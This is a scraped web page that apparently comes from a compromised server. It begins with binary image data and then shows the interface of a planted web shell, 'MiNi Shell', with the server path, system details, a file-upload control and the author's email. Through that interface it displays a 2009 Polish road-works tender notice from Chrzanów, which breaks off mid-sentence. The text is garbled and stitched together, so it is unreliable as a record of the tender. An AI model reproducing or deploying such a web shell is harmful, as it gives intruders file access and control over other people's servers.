JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090504/69263-N-2009.html

<p class="kh_header"><b>Chrzanów: Projekt realizowany w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 pn.
Przebudowa i remont ciągów części dróg powiatowych Powiatu Chrzanowskiego przebiegających na obszarach gmin Alwernia,Chrzanów  i Trzebinia.

Część I  :
Remont i przebudowa dróg powiatowych 1029K relacji Trzebinia-Piła Kościelecka - Bolęcin; 1026K-odcinek pomiędzy skrzyżowaniami z drogami 1029K i 1032K; 1032K-całość przebiegu; 1033K- odcinek od granicy powiatu do skrzyżowania z drogą 1034K; przebudowa skrzyżowania dróg powiatowych 1033K i 1034K w Grojcu.</b><br>
<b>Numer ogłoszenia: 69263 - 2009; data zamieszczenia: 04.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Chrzanowie , ul. Grzybowskiego 7A, 32-500 Chrzanów, woj. małopolskie, tel. 032 6231272, 6234687, faks 032 6231272.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt realizowany w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 pn.
Przebudowa i remont ciągów części dróg powiatowych Powiatu Chrzanowskiego przebiegających na obszarach gmin Alwernia,Chrzanów  i Trzebinia.

Część I  :
Remont i przebudowa dróg powiatowych 1029K relacji Trzebinia-Piła Kościelecka - Bolęcin; 1026K-odcinek pomiędzy skrzyżowaniami z drogami 1029K i 1032K; 1032K-całość przebiegu; 1033K- odcinek od granicy powiatu do skrzyżowania z drogą 1034K; przebudowa skrzyżowania dróg powiatowych 1033K i 1034K w Grojcu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres :
			
1.Wykonanie wykopów mechanicznych w gruncie kat I-II	            m3    24 159,50
2.Wykonanie nasypów mechanicznie z gruntu kat I-II z pozyskaniem
 i transportem gruntu			                         m3    24 253,00
3.Wykonanie kanalizacji deszczowej PCV o średnicy 315mm          mb       2 985,00
4.Wykonanie kanalizacji deszczowej z rur PEHD 
o średnicy 300mm					           mb           62,00
5.Wykonanie rowu krytego z rur betonowych średnicy 600mm      mb          108,00
6.Wkonanie przykanalików z rur PCV o średnicy 150mm	           mb          268,50
7.Wykonanie studni rewizyjnych o średnicy 1000mm	          szt             75,00
8.Wykonanie studni rewizyjnych o średnicy 1500mm	          szt.             5,00
9.Wykonanie studzienek ściekowych o średnicy 450 mm 
z osadnikiem	                      			           szt.          69,00
10.Podbudowa  z kruszywa łamanego 0/31,5mm w-wa 
dolna gr. 20cm				             	m2    43 168,00
11.Podbudowa z kruszywa naturalnego 0/63mm 	
w-wa dolna gr. 25cm		                                     m2     15 414,00
12.Podbudowa z kruszywa naturalnego 0/63mm 
w-wa dolna gr. 35cm		                                    m2      31 558,00
13.Podbudowa z kruszywa naturalnego 0/31,5 gr. 15cm	          m2          792,00
14.Podbudowa z betonu cementowego gr. 24cm		          m2        1 608,00
15.Podbudowa z betonu asfaltowego WMS 
o uziarnieniu 0/20 gr. 8cm			                        m2      39 374,00
16.Wykonanie warstwy separacyjno - filtracyjnej z geowłókniny      m2    40 988,00
17.Nawierzchnia zjazdów z destruktu gr. Okło 15cm		 m2     2 971,00
18.Nawierzchnia betonowa zjazdów				 m2        124,00
19.Nawierzchnia z asfaltu BA WMS o uziarnieniu 0/20mm 
w-wa wiążąca gr. 8cm			                         m2     67 037,00
20.Nawierzchnia z betonu asfaltowego o uziarnieniu 0/16mm 
w-wa ścieralna gr. 5cm				            m2     75 307,00
21.Nawierzchnia z kostki brukowej gr. 8 cm - kolor czerwony        m2       1 633,00
22.jw. Lecz gr. 10cm - kolor szary			           m2        1 608,00
23.Ustawienie barier ochronnych stalowych 		          mb            228,00
24.Krawężnik betonowy 15x30 na ławie betonowej                    mb        21 700,00
25.Krawężnik kamienny 20x25 ma ławie betonowej	          mb             58,00
26.Chodniki z kostki brukowej gr. 6cm - kolor szary	          m2       10 563,00
27.Chodniki z kostki brukowej gr. 6cm - kolor czerwony	          m2        1 372,00
28.Obrzeże betonowe 30x8			                      mb         7 336,00
29.Ciek przykrawężnikowy z kostki brukowej	                      mb         8 334,00.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium  w wysokości: 200 000,00zł (słownie : dwieście tysięcy złotych 00/100) 
Wadium może być wnoszone w jednej lub  kilku następujących formach:
a.	pieniądzu,
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju 


Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego : 
BS o / Chrzanów  nr 33 8444 0008 0000 0080 5474 0004
Kserokopię dowodu wpłaty należy dołączyć do oferty. 
Za wniesione wadium w pieniądzu zamawiający uznaje fakt wpływu środków na wyżej podany rachunek bankowy przed upływem terminu składania ofert ,podanego w specyfikacji.
W przypadku wnoszenia wadium w formie dokumentów wymienionych w ppkt. b,c,d oraz e - ich oryginał należy złożyć w sekretariacie Powiatowego Zarządu Dróg 
w Chrzanowie , pokój nr 110, natomiast kserokopię należy dołączyć do oferty.

W przypadku wniesienia wadium w formie poręczenia lub gwarancji Zamawiający wymaga, aby w treści takiego dokumentu znalazło się oświadczenie Poręczyciela (Gwaranta), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 5 ustawy Prawo zamówień publicznych. Jednocześnie Zamawiający wymaga, aby okres ważności poręczenia (gwarancji) nie był krótszy niż okres związania ofertą.
Wadium dla Konsorcjum może być wniesione przez jednego z uczestników
Konsorcjum.


Brak wniesienia wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie Wykonawcy z postępowania.

14)Zwrot wadium

1.Zamawiający zwraca wadium na zasadach określonych w art. 46 ustawy z dnia 
 29 stycznia 2004r.Prawo Zamówień Publicznych(.Dz.U.Nr 223, poz 1655 z 2007r z późn.zm) jeżeli :
1.1. 	upłynął termin związania ofertą;
1.2. 	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
1.3. 	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
2. Wadium zostanie zwrócone niezwłocznie na wniosek wykonawcy : 
2.1. 	który wycofał ofertę przed upływem terminu składania ofert;
2.2. 	który został wykluczony z postępowania;
2.3. 	którego oferta została odrzucona.
3.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie ust. 2 pkt 2 i 3 , jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
4.    Jeżeli wadium wniesiono w pieniądzu, zwraca się je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
4a.    Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
5.   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
5.1. 	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
5.2. 	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
5.3. 	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.Posiadają uprawnienia niezbędne do wykonania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznymi osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art.24 ust.1 i 2 Pzp)
5.Złożą ofertę odpowiadającą treści SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełniony formularz ofertowy (zał. nr 1) oraz wypełnioną  Tabelę elementów   
scalonych (zał. nr1a.)  jako załączniki do niniejszej dokumentacji.
2.Zaakceptowany i podpisany przez uprawnionego przedstawiciela (pełnomocnika) Wykonawcy przedmiar robót .
3.Oświadczenie stwierdzające, że Wykonawca spełnia wymagania art. 22 
i nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych (załącznik nr 2).W przypadku gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
4.Aktualny(tzn. wystawiony lub potwierdzony przez organ wydający, że działalność jest prowadzona nadal ) odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.  W przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą, w miejsce dokumentu o którym mowa powyżej zobowiązany jest przedłożyć dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z §2 i §4 Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008r zmieniającym rozporządzenie w sprawie rodzaju dokumentów , jakich może żądać zamawiający od wykonawcy, oraz form , w jakich te dokumenty mogą być składane (Dz.U.Nr 188, poz.1155) 
5.Aktualne uprawnienia budowlane kierownika robót  w specjalności odpowiadającej przedmiotowi zamówienia - uprawnienia drogowe wraz z zaświadczeniem  potwierdzającym jego członkostwo we właściwej Izbie Samorządu Zawodowego,  pod rygorem wykluczenia Wykonawcy z postępowania. 
6.Wykaz wykonanych robót budowlanych w ciągu ostatnich pięciu lat (2004-2008) przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, jako generalny Wykonawca lub Podwykonawca, odpowiadających swoim rodzajem i zakresem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat i miejsca wykonania, wg załącznika nr 3 do siwz, oraz załączeniem dokumentów potwierdzających, że wszystkie wykazane roboty zostały wykonane należycie( np. protokół odbioru). Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż w ciągu ostatnich pięciu lat wykonał co najmniej jedną pracę polegającą na wykonaniu minimum 35 000 m2 warstwy wiążącej w technologii WMS. 
7.Udzielenie minimum 3 letniej gwarancji na wykonane roboty.
8.Wykaz osób uczestniczących w wykonaniu zamówienia wg wzoru - załącznik nr 4.
9.Zaakceptowany i podpisany przez uprawnionego przedstawiciela (pełnomocnika) Wykonawcy projekt umowy wraz z pieczątką firmową i imienną Wykonawcy (załącznik nr 5). W przypadku gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich.
10.Potencjał ekonomiczno - finansowy: przedłożenie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnie z przedmiotem zamówienia, na wartość co najmniej  5 000 000,00zł 
( słownie :pięć milionów złotych)
11.Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich, chyba, że dokument opiewa na wszystkie te podmioty.
12.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt. 4 do 8 ustawy prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

13.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24  ust.1 pkt.9 ustawy prawo zamówień publicznych, wystawiona nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert.
14.Dowód wpłacenia / wniesienia wadium.
15.Umowę spółki cywilnej, jeżeli działalność gospodarcza jest prowadzona w formie spółki cywilnej .
16.Oryginał pełnomocnictwa lub pełnomocnictwo poświadczone przez notariusza,  jeśli oferta będzie podpisana przez pełnomocnika upoważnionego do
reprezentowania wykonawców ( konsorcjum) wspólnie ubiegających się o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zamawiający będzie wymagał przedstawienia umowy regulującej współpracę w/w Wykonawców.
17.Dokumenty, zaświadczenia i oświadczenia, o których mowa powyżej należy dołączyć razem do oferty i złożyć w formie oryginałów lub kserokopii posiadających potwierdzenie zgodności z oryginałem przez osobę (osoby) upoważnioną (pełnomocnika) do składania oświadczeń woli w imieniu Wykonawcy
18.Inne dokumenty dołączone do oferty, sporządzone w języku obcym, składane są wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego.

Dokumenty, zaświadczenia i oświadczenia, o których mowa powyżej należy dołączyć do oferty i złożyć w formie oryginałów lub kserokopii posiadających potwierdzenie zgodności z oryginałem przez osobę (osoby) upoważnioną (pełnomocnika) do składania oświadczeń woli w imieniu Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/bip/chrzanowski.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Chrzanowie, 32-500 Chrzanów, ul. Grzybowskiego 7A, pokój nr 110 (I piętro)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2009 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Chrzanowie, 32-500 Chrzanów, ul. Grzybowskiego 7A, pokój nr 110 (I piętro)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Oś priorytetowa 4. Infrastruktura dla rozwoju gospodarczego, działanie 4.1 Rozwój infrastruktury drogowej, Schemat C: Drogi powiatowe współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego pod nazwą:

Creat By MiNi SheLL
Email: jattceo@gmail.com